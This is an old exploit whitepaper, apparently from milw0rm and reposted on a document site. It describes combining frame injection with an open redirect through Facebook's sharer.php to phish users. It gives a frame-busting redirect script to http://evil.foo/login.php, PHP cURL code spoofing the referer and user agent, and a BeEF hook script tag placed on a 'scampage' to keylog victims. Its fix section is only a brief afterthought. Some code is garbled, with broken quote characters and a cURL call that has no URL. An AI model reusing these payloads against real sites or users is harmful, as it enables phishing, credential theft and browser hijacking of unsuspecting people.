Professional Documents
Culture Documents
Frame Injection
Frame Injection
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Disclamer:
----------
In this paper we will see how we can combine "legal" frame injection to succeed to
a redirect vulnerability. This paper has been written for informational purpose,
don't use it illegaly. I would be in no cases responsible of your acts further to
the reading of this article.
0) Sum up:
---------
1) Introduction
2) Frame injection definition, explanation
3) Description of the targeted url used as payload
4) Redirects a little description about the exploit
5) Way of exploitation, combining redirect with frame injection vulnz
6) Correct the vuln please !
7) Linkz and Greetz
Needed:
-A web server with cURL enabled
-Knowledge in php / js
-A facebook account and friends to test the exploit
-Beef (bindshell.net)
-Frame injections and eyes to read it.
1) Introduction
---------------
Day after days the web vulnerabilities are subjected to a constant evolution
due to the diversity of the web programming langages. Mostly the targets first
touched are the social network and the search engines because of their huge visits
by days. That's why these website are compelled of applying the principle of
responsible disclosure in order to protect their customers and avoid the abuse.
Definition:
A frame injection attack (on the web) is an attack who works on all GUI based
browsers , it consist in load arbitrary code such as Javascript, VBScript
(activeX), flash , AJAX (html+js+py). This happens when code gets injected through
frames due to scripts not validating their input.
Here is why:
* There is no need to inject special control characters such as angle brackets
(unlike HTMLi/XSS)
* HTMLi/XSS filtering routines will not project against frame injection since
the attacker only needs to insert a URL in the non-sanitized parameter
The best way to explain what I mean is to show an example. Most frame injection
issues occur in web applications because dynamic frameset/iframe insertion is not
implemented with enough filtering. For instance, say that we have the following URL
on the target site:
https://www.victim.foo/index.php?targeturl=/contact.php
A malicious user with intentions of launching a phishing attack will try tampering
the targeturl parameter. His goal is to insert a third-party page that is under his
control, rather than the original contact page. Indeed, index.php, although is not
allowing HTML or JavaScript to be assigned to targeturl, is happy to process an
absolute URL rather than a relative one:
https://www.victim.foo/index.php?targeturl=http://evil.foo/login.php >>
Note : The attacker can encode the malicious pishing link to hex values, we didn't
use that on this paper.
This technique will work only if the victim contact has added you to his friend
list and if the facebook session cookie is stored by your browser.The legal frame
injection on facebook consist to input an url on the page named sharer.php.In
facebook you can see if a contact is online or not when you accept him as friend or
if his profile is public. A malicious attacker will try to add you to gain
information about you. In facebook i advice you to dont allow every untrusted
contact to add you because he can try to hack you account like sending to you a
malicious link.
Or
The most common attack vector is manifested by the presence of a double url in the
attack:
http://site.com/redirect?r=http://malicious_website.com
The facebook sharer.php input source might looks like this script:
#########################################################################
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title> Welcome in my-site-is-not-secure-now.w00t</title>
</head>
<frameset rows="*" cols="110,*" frameborder="NO" border="0" framespacing="0">
<frame src="navigation.htm" name="navigation" frameborder="yes" scrolling=""NO"
bordercolor="#0000CC" id="navigation">
<frameset rows="98,*" cols="*" framespacing="0" frameborder="NO" border="0" >
<frame src="en_tete.htm" name="en-tete" frameborder="yes" scrolling="NO"
bordercolor="#000000" id="en-tete">
<frame src="<?php
//secure code
if(isset($_GET['iframe']))
{
$allowUrls = array("http://www.google.fr/imgres?
imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php");
//^^^^^^^^^^^^sharer.php allowed links here
if(in_array($_GET['iframe'], $allowUrls))
echo $_GET['iframe']; //if iframe have an url allowed
else // for show the main page (or an error page)
echo "accueil.htm";
}
else // !!!
echo "accueil.htm";
?>" name="corps" scrolling="auto" id="corps">
</frameset>
</frameset><noframes>No frames :(</noframes>
</html>
#########################################################################
The facebook change the malicious url to a clean link like (the 501337 Crew p3lo
are the generated values, letters and numbers by the sharer.php script):
http://www.facebook.com/ext/share.php?sid=501337&h=Crew&u=p3lo
And the link on the facebook profile appeared like this:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Results of image search
http://www.google.fr/imgres?imgurl=http://fake_url...
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
<SCRIPT LANGUAGE="JavaScript">
if (top.frames.length!=0) top.location=self.document.location;
</SCRIPT>
</head>
<body bgcolor="#99FF66">
The first script contained in the head permit to kill the first frame of my payload
url redirecting it to self.document.location .
The second script permit to redirect my page to an advanced pishing page (keylogged
with beef bindshell.net)
.p3lo
<br>
<br><br>
</body>
<br><br><script>document.location="http://evil.foo/login.php";</script><br>
###############################################################################
###############################################################################
<?php
//by p3lo
//this is how to send a get request with cURL (your server have to be cURL enabled)
//spoofing referer
$referer=â€http://www.facebook.com/â€;
// spoofing FireFox 2.0
$useragent=â€Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1)
Gecko/20061204 Firefox/2.0.0.1?;
$ch = curl_init();
curl_exec ($ch);
curl_close ($ch);
?>
<script src=â€http://beefsite/beef/hook/beefmagic.js.phpâ€></script> //
<——-beef on my scampage page
###############################################################################
After a long moment of research, i think that the best way to correct these
vulnerabilities is to assure the user that he leave the page and the website
domain. A redirection page to ensure his choice is the best way to warn the user of
the possibles threats against him.
I hope you have taken pleasure to read my whitepaper.
# milw0rm.com [2009-02-12]